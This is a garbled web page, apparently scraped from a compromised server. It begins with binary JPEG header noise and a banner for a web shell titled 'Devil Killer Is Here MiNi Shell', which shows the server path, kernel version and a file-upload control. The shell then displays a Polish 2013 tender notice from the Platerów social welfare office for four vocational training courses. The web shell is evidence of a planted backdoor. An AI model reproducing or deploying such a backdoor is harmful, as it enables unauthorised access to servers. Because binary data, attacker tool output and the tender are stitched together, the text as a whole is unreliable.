JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130911/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130911/368686-N-2013.html

<p class="kh_header"><b>Platerów: Przedmiotem zamówienia jest organizacja i przeprowadzenie 4 szkoleń zawodowych dla 5 osób w ramach projektu Aktywizacja społeczno - zawodowa bezrobotnych w gminie Platerów współfinansowanego ze środków Europejskiego Funduszu Społecznego i realizowanego przez Gminny Ośrodek Pomocy Społecznej w Platerowie w ramach Programu Operacyjnego Kapitał Ludzki - Priorytet VII, Działanie 7.1, poddziałanie 7.1.1.
Zamówienie realizowane będzie w formie szkoleń w zakresach tematycznych, z których każdy stanowi odrębną część:</b><br>
<b>Numer ogłoszenia: 368686 - 2013; data zamieszczenia: 11.09.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Ośrodek Pomocy Społecznej , ul. 3 Maja 5, 08-210 Platerów, woj. mazowieckie, tel. 83 357 84 11, faks 83 357 84 11.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gops-platerow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest organizacja i przeprowadzenie 4 szkoleń zawodowych dla 5 osób w ramach projektu Aktywizacja społeczno - zawodowa bezrobotnych w gminie Platerów współfinansowanego ze środków Europejskiego Funduszu Społecznego i realizowanego przez Gminny Ośrodek Pomocy Społecznej w Platerowie w ramach Programu Operacyjnego Kapitał Ludzki - Priorytet VII, Działanie 7.1, poddziałanie 7.1.1.
Zamówienie realizowane będzie w formie szkoleń w zakresach tematycznych, z których każdy stanowi odrębną część:.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część 1 - Prawo jazdy kat CE
1.Realizacja kursu prawa jazdy kat. CE. dla 2 osób odbywać się będzie w terminie od dnia podpisania umowy do 20 grudnia 2013r. zgodnie z harmonogramem ustalonym razem z Wykonawcą po rozstrzygnięciu przetargu. 2.Dzienny wymiar zajęć nie powinien przekroczyć 5 godzin zegarowych z uwzględnieniem przerw. Ilość godzin szkolenia - 45 godzin/os., w tym 20 godzin dydaktycznych45 min i 25 godzin   praktycznych pełne godziny zegarowe. Uczestnik najpóźniej w dniu rozpoczęcia  szkolenia musi otrzymać: harmonogram szkolenia w formie papierowej. 3.Miejsce realizacji szkolenia: zajęcia dydaktyczne - w siedzibie Wykonawcy po jego wyborze maksymalnie 50 km od Platerowa. zajęcia praktyczne  -  w siedzibie Wykonawcy po jego wyborze maksymalnie 50 km od Platerowa. 4.Warunki lokalowe, sale szkoleniowe, także w miejscu szkolenia praktycznego oraz wykorzystywany sprzęt muszą spełniać wymogi w zakresie BHP i p. poż.
5.Wykonawca niezwłocznie po rozpoczęciu szkolenia przedstawi polisę NNW następstw nieszczęśliwych wypadków potwierdzającą obowiązkowe ubezpieczenie kursanta 6.Wykonawca zobowiązany jest zapewnić uczestnikom konieczne materiały szkoleniowe prezentacja szkolenia lub podręcznik zgodny z tematyką szkolenia, teczka na materiały szkoleniowe, notes, długopis, w tym jeden komplet do dokumentacji projektu, harmonogram szkolenia oraz przerwy kawowe herbata, kawa, napoje zimne, ciastka, woda. 7.Zaświadczenia, certyfikaty, materiały szkoleniowe, program szkolenia - muszą być oznakowane zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach POKL 2007 - 2013. 8.Zajęcia w ramach kursu zrealizują nauczyciele/instruktorzy wykonawcy, którzy posiadają odpowiednie kwalifikacje zawodowe. 9.Wykonawca do 30 listopada  2013 roku skieruje wszystkie osoby na egzamin Państwowy oraz dokona jego opłaty. 10.Wykonawca zapewnia: sprzęt niezbędny do przeprowadzenia szkolenia, materiały szkoleniowe podręczniki i płyty CD z testami egzaminacyjnymi, w tym jeden dodatkowy do dokumentacji projektu,  W koszt Kursu należy wliczyć opłatę za pierwszy egzamin teoretyczny i praktyczny. 11.Wykonawca skieruje uczestników i pokryje koszty niezbędnych badań lekarskich. 
12.Osoby skierowane na szkolenie nie będą posiadały założonego Profil Kandydata na Kierowcę    dlatego Wykonawca zobowiązany jest do skierowania kandydatów na badania lekarskie i wniesienie za niego opłaty w celu uzyskania zaświadczenie lekarza o braku przeciwwskazań do prowadzenia pojazdów oraz badania psychotechniczne. 
13.Zaświadczenia, certyfikaty, materiały szkoleniowe, program szkolenia - muszą być oznakowane zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach POKL 2007 -2013. 14.Zajęcia w ramach kursu zrealizują wykładowcy i instruktorzy wykonawcy, którzy posiadają odpowiednie kwalifikacje zawodowe. 15.Wykonawca będzie prowadził dokumentację szkolenia, tj. imienne listy obecności z każdego dnia szkolenia, imienne listy potwierdzające poczęstunek, imienne listy odbioru materiałów szkoleniowych, protokoły z egzaminów. Wykonawca przekaże Zamawiającemu potwierdzone za zgodność z oryginałem kserokopie dokumentów kursu. 
Część 2 - Szkolenie okresowe na przewóz rzeczy 1.Zamawiający do dnia 31 października  skieruje na szkolenie jedną osobę posiadającą prawo jazdy kategorii C wydane przed 10 września 2009 roku. 2.Ilość godzin szkolenia - 35 godzin na osobę przy czym jedną godzinę zajęć należy rozumieć jako 60 min , 45 minut zajęć, 15 minut przerwy. 3.Miejsce realizacji szkolenia: w siedzibie wykonawcy, szkolenie musi się odbywać na terenie miasta Łosice 4.Warunki lokalowe, sale szkoleniowe, także w miejscu szkolenia praktycznego oraz wykorzystywany sprzęt muszą spełniać wymogi w zakresie BHP i p. poż. 5.Wykonawca niezwłocznie po rozpoczęciu szkolenia przedstawi polisę NNW następstw nieszczęśliwych wypadków potwierdzającą obowiązkowe ubezpieczenie kursanta 6.Wykonawca zobowiązany jest zapewnić uczestnikowi konieczne materiały szkoleniowe prezentacja szkolenia lub podręcznik zgodny z tematyką szkolenia, teczka na materiały szkoleniowe, notes, długopis, w tym jeden komplet do dokumentacji projektu, harmonogram szkolenia oraz przerwy kawowe herbata, kawa, napoje zimne, ciastka, woda. 7.Zaświadczenia, certyfikaty, materiały szkoleniowe, program szkolenia - muszą być oznakowane zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach POKL 2007 - 2013. 
8.Zajęcia w ramach kursu zrealizują nauczyciele , instruktorzy wykonawcy, którzy posiadają odpowiednie kwalifikacje zawodowe. 9.Wykonawca do 13 grudnia  2013 roku skieruje kursanta na egzamin Państwowy oraz dokona jego opłaty. 10.Wykonawca zapewnia sprzęt niezbędny do przeprowadzenia szkolenia, materiały szkoleniowe podręczniki i płyty CD z testami egzaminacyjnymi, w tym jeden dodatkowy do dokumentacji projektu,  W koszt Kursu należy wliczyć opłatę za pierwszy egzamin teoretyczny i praktyczny. 11.Osoba skierowana będzie posiadała niezbędne badania lekarskie. 12.Zaświadczenia, certyfikaty, materiały szkoleniowe, program szkolenia - muszą być oznakowane zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach POKL 2007 -2013. 13.Zajęcia w ramach kursu zrealizują wykładowcy i instruktorzy wykonawcy, którzy posiadają odpowiednie kwalifikacje zawodowe. 14.Wykonawca będzie prowadził dokumentację szkolenia, tj. imienne listy obecności z każdego dnia szkolenia, imienne listy potwierdzające poczęstunek, imienne listy odbioru materiałów szkoleniowych, protokoły z egzaminów. Wykonawca przekaże Zamawiającemu potwierdzone za zgodność z oryginałem kserokopie dokumentów kursu. Część III - Kurs fryzjerski,   ilość osób - 1. 1.Cel kursu Zdobycie teoretycznych podstaw oraz praktycznych umiejętności pielęgnacji i stylizacji włosów, organizacji salonu fryzjerskiego. 2.Ilość godzin szkolenia - minimum 160 godzin, w tym minimum 40 godzin zajęć teoretycznych, minimum 120 godzin zajęć praktycznych. 3.Miejsce realizacji szkolenia szkolenie musi się odbywać na terenie miasta Siedlce 4.Minimalny zakres tematyczny kursu anatomia, budowa, właściwości skóry pielęgnacja włosów, strzyżenie damskie i męskie, koloryzacja włosów, dobór fryzury i koloru, baleyage, trwała ondulacja, stylizacja fryzur, prostowanie, loczkowania z prostownicy,  wiadomości z zakresu materiałów, narzędzi,  kosmetyków, czesanie fryzur wieczorowych, ślubnych i upięć artystycznych, zajęcia praktyczne 5.Wykonawca ponosi koszt wykonania wymaganych badań lekarskich niezbędnych dla uczestników kursu, 6.Wykonawca zobowiązany jest zapewnić ubezpieczenie od następstw nieszczęśliwych wypadków dla uczestników kursu,
7.Wykonawca zobowiązany jest zapewnić uczestnikom materiały dydaktyczne niezbędne do uczestnictwa w kursie opatrzone w logo Europejskiego Funduszu Społecznego, UE, PO KL. 8.Wykonawca zabezpieczy materiały, akcesoria niezbędne do przeprowadzenia części praktycznej kursu. 9.Wykonawca zobowiązany jest do realizacji kursu na wysokim poziomie, dostosowanego do specyfiki kursu z zachowaniem wymogów sanitarnych, przepisów BHP i przepisów przeciwpożarowych. Sala szkoleniowa powinna być wyposażona w sprzęt niezbędny do realizacji przedmiotu zamówienia. 10.Zamawiający zastrzega sobie prawo do kontroli prowadzonych zajęć, w tym niezapowiedzianej, przez uprawnione organy nadzoru i kontroli. Kontrola może zostać przeprowadzona zarówno w siedzibie zamawiającego, w miejscu realizacji kursu, jak i innym miejscu określonym przez uprawniony podmiot dokonujący kontroli. 11.Wykonawca zobowiązany jest po zakończeniu kursu w terminie trzech dni roboczych dostarczyć Zamawiającemu kserokopie
wydanych zaświadczeń potwierdzających udział w kursie oraz  rejestr potwierdzający   ich wydanie. dziennika zajęć edukacyjnych zawierającego listę obecności, wymiar godzin zajęć edukacyjnych, tematy zajęć edukacyjnych,	zaświadczeń lekarskich, list potwierdzających odbiór materiałów dydaktycznych zawierających indywidualny numer uczestnika kursu, jego dane osobowe, rodzaj wydanych materiałów dydaktycznych, datę i podpis uczestnika
12. Wykonawca zobowiązany jest zapewnić uczestnikowi konieczne materiały szkoleniowe prezentacja szkolenia lub podręcznik zgodny z tematyką szkolenia, teczka na materiały szkoleniowe, notes, długopis, harmonogram szkolenia oraz przerwy kawowe herbata, kawa, napoje zimne, ciastka, woda.
13. Zaświadczenia, certyfikaty, materiały szkoleniowe, program szkolenia - muszą być oznakowane zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach POKL 2007 - 2013. 14. Zajęcia w ramach kursu zrealizują nauczyciele, instruktorzy wykonawcy, którzy posiadają odpowiednie kwalifikacje zawodowe. 15. Wykonawca do 13 grudnia  2013 roku skieruje kursanta na egzamin.16. Wykonawca będzie prowadził dokumentację szkolenia, tj. imienne listy obecności z każdego dnia szkolenia, imienne listy potwierdzające poczęstunek, imienne listy odbioru materiałów szkoleniowych, protokoły z egzaminów. Wykonawca przekaże Zamawiającemu potwierdzone za zgodność z oryginałem kserokopie dokumentów kursu. 
Część IV Kurs operatora koparko-ładowarki
1.Realizacja kursu Operator koparko - ładowarki dla 1 osoby odbywać się będzie w terminie od dnia podpisania umowy do 13 grudnia 2013 r., zgodnie z harmonogramem ustalonym razem z Wykonawcą po rozstrzygnięciu przetargu. 
2.Celem szkolenia jest zdobycie teoretycznych i praktycznych umiejętności w zakresie obsługi i budowy koparko - ładowarki, a także uzyskania uprawnień państwowych w zakresie obsługi tego typu sprzętu potwierdzonych wpisem do centralnego rejestru osób uprawnionych.
3.Liczba godzin zajęć dydaktycznych 176 godzin. Uczestnik, najpóźniej w dniu rozpoczęcia  szkolenia, musi otrzymać harmonogram szkolenia w formie papierowej.
4.Częstotliwość zajęć: zajęcia powinny odbywać się w wymiarze do 40 godzin zajęć dydaktycznych w tygodniu,  max 8 godzin lekcyjnych dziennie, lecz nie mniej niż 6 godzin lekcyjnych dziennie, w dni powszednie od poniedziałku do piątku, w godzinach 8.00 - 18.00 - dopuszcza się możliwość zorganizowania zajęć w dni wolne od pracy za zgodą uczestnika.5.Miejsce realizacji usługi zajęcia dydaktyczne w siedzibie Wykonawcy, po jego wyborze, maksymalnie 50 km od Platerowa; zajęcia praktyczne - w siedzibie Wykonawcy po jego wyborze maksymalnie 50 km od Platerowa.
6.Program szkolenia powinien uwzględniać standardy kwalifikacji zawodowych i modułowe programy szkoleń zawodowych, dostępnych w ministerialnych bazach danych.www.standardyiszkolenia.praca.gov.pl Materiały szkoleniowe prezentacja szkolenia lub podręcznik zgodny z tematyką szkolenia, teczka na materiały szkoleniowe, notes, długopis, w tym jeden komplet do dokumentacji projektu, przekazane nieodpłatnie uczestnikowi kursu powinny być adekwatne do treści kursu, dobre jakościowo, przekazywane na początku szkolenia.
7.Wykonawca winien dysponować ilościowo i jakościowo pomieszczeniami, sprzętem i pomocami dydaktycznymi do potrzeb powyższego szkolenia, z uwzględnieniem  bezpiecznych  i higienicznych warunków pracy i nauki.8.Zajęcia w ramach kursu zrealizują nauczyciele, instruktorzy Wykonawcy, którzy posiadają odpowiednie kwalifikacje zawodowe.9.W trakcie zajęć należy przewidzieć przerwy kawowe w ramach, których Wykonawca zapewni Uczestnikowi kawę, herbatę, napoje, soki, ciastka, paluszki, 10.Pomieszczenia, materiały szkoleniowe zapewnione przez Wykonawcę podczas szkolenia teoretycznego oraz zaświadczenia i certyfikaty, muszą być odpowiednio oznakowane poprzez umieszczenie logo Programu Operacyjnego Kapitał Ludzki, informacji o fakcie współfinansowania szkolenia ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.
11.W ramach realizacji zamówienia Wykonawca zapewni badania lekarskie uczestnikowi celem wydania zaświadczeń o braku przeciwwskazań zdrowotnych do podjęcia zatrudnienia jako operator koparko - ładowarki.12.Wykonawca zobowiązany jest ubezpieczyć uczestnika szkolenia od następstw nieszczęśliwych wypadków. 13.Wykonawca zorganizuje i uwzględni w przedłożonej ofercie koszt przystąpienia do egzaminu państwowego oraz wydanie dokumentów potwierdzających nabycie uprawnień. 14.Wykonawca jest zobowiązany- prowadzić ewidencję obecności uczestnika kursu, - do informowania Zamawiającego o powtarzających się nieobecnościach uczestnika w przypadku przekroczenia 10 procent nieobecności.
15.Po zakończeniu kursu Wykonawca przeprowadzi ankietę oceniającą kurs.
16.Po zakończeniu kursu Wykonawca przekaże Zamawiającemu pełną dokumentację kursu, tj. oryginały list obecności, obecność  na zajęciach uczestnik potwierdza własnoręcznym podpisem, kopie dziennika zajęć, rejestru wydanych oraz kopie zaświadczeń potwierdzających ukończenie szkolenia, oświadczeń uczestnika potwierdzających odbiór materiałów szkoleniowych, kopię polisy ubezpieczenia, kopię  zaświadczenia lekarza  o braku przeciwwskazań zdrowotnych do  obsługi koparko - ładowarki.17.Zamawiający dopuszcza możliwość przyłączenia uczestnika kursu do innej grupy szkoleniowej o ile grupa taka będzie w tym czasie kurs odbywała..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.41.10.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)posiadają uprawnienia niezbędne do wykonania zamówienia:
Opis sposobu dokonywania oceny spełniania warunku: tzn. prowadzą działalność gospodarczą w  zakresie dotyczącym realizacji przedmiotu zamówienia zarejestrowaną w Krajowym Rejestrze Sądowym lub innym organie ewidencji działalności gospodarczej. Wypis z KRS lub inny dokument stwierdzający uprawnienia do prowadzenia przedmiotowej działalności</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>b)posiadają niezbędną wiedzę i doświadczenie:Opis sposobu dokonywania oceny spełniania warunku: Wykonawca wykaże, że w ostatnich trzech latach do dnia składania ofert, a jeżeli okres prowadzenia działalności był krótszy to w tym okresie zrealizował należycie co najmniej jedno szkolenia indywidualne lub grupowe dla minimum 1 osoby w zakresie zgodnym z przedmiotem zamówienia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>c)dysponują odpowiednim potencjałem technicznym do wykonania zamówienia.
Opis sposobu dokonywania oceny spełniania warunku: warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże, że dysponuje lub będzie dysponować:
1.w przypadku Kursu prawa jazdy kat. CE co najmniej: 1 pojazd przeznaczony do nauki jazdy spełniający wymagania i dopuszczony do prowadzenia nauki jazdy placem manewrowym o parametrach pozwalających na przeprowadzenie nauki jazdy w warunkach wymaganych przepisami, jedną salą wykładową wyposażoną w pomoce dydaktyczne 2. w przypadku Szkolenia okresowego na przewóz rzeczy - jedną salą wykładową wyposażoną w pomoce dydaktyczne. 3. W przypadku kursu fryzjerskiego - jedną salą  wyposażoną w sprzęt niezbędny do prawidłowej realizacji zamówienia.
4. w przypadku Kursu - operator koparko - ładowarki, własną koparko - ładowarką</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponowania odpowiednimi osobami zdolnymi do wykonania zamówienia. Opis sposobu dokonywania oceny spełniania warunku: warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże, że dysponuje lub będzie dysponować:
- w zakresie prowadzenia szkolenia w ramach  Kursu prawa jazdy kat. CE: wykonawcy powinni  wskazać, że kadra dydaktyczna którą dysponują składa się między innymi z co najmniej jednego instruktora prawa jazdy kat. CE. Wskazani przez wykonawcę wykładowcy instruktorzy, powinni posiadać odpowiednie kwalifikacje zawodowe i uprawnienia do prowadzenia zajęć w powierzonym sobie zakresie oraz najmniej dwuletnie doświadczenie przy realizacji zadań w zakresie objętym przedmiotem zamówienia, który będą realizować - w zakresie prowadzenia szkolenia w ramach  szkolenia okresowego na przewóz rzeczy: wykonawcy powinni  wskazać, że kadra dydaktyczna którą dysponują składa się między innymi z co najmniej jednego instruktora prawa jazdy kat. CE. Wskazani przez Wykonawcę wykładowcy instruktorzy, powinni posiadać odpowiednie kwalifikacje zawodowe i uprawnienia do prowadzenia zajęć w powierzonym sobie zakresie oraz najmniej dwuletnie doświadczenie przy realizacji zadań w zakresie objętym przedmiotem zamówienia, który będą realizować. w zakresie prowadzenia szkolenia w ramach kursu fryzjerskiego:  wykonawcy powinni  wskazać, że kadra dydaktyczna, którą dysponują składa się między innymi z co najmniej jednej osoby posiadającej minimum tytuł mistrza i przygotowaniem pedagogicznym. Wskazani przez Wykonawcę wykładowcy  instruktorzy, powinni posiadać odpowiednie kwalifikacje zawodowe i uprawnienia do prowadzenia zajęć w powierzonym sobie zakresie oraz najmniej dwuletnie doświadczenie przy realizacji zadań w zakresie objętym przedmiotem zamówienia, który będą realizować. w zakresie prowadzenia szkolenia w ramach kursu operatora koparko ładowarki:  wykonawcy powinni  wskazać, że kadra dydaktyczna, którą dysponują składa się między innymi z co najmniej co najmniej jednego instruktora w zakresie operatora koparko ładowarki. Wskazani przez Wykonawcę wykładowcy  instruktorzy, powinni posiadać odpowiednie kwalifikacje zawodowe i uprawnienia do prowadzenia zajęć w powierzonym sobie zakresie oraz najmniej dwuletnie doświadczenie przy realizacji zadań w zakresie objętym przedmiotem zamówienia, który będą realizować.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie określa tego warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

